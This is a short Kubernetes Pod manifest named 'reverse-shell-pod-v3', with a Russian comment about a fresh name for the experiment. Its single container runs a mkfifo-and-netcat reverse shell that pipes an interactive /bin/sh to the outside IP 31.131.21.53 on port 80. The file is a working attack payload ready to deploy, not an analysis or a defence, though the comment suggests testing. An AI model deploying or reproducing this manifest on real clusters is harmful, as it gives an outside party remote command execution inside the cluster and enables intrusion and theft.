apiVersion: v1
kind: Pod
metadata:
  name: reverse-shell-pod-v3 # Снова новое имя для чистоты эксперимента
spec:
  containers:
  - name: shell-container
    image: alpine
    command: ["/bin/sh", "-c"]
    args:
    - |
      rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 31.131.21.53 80 >/tmp/f
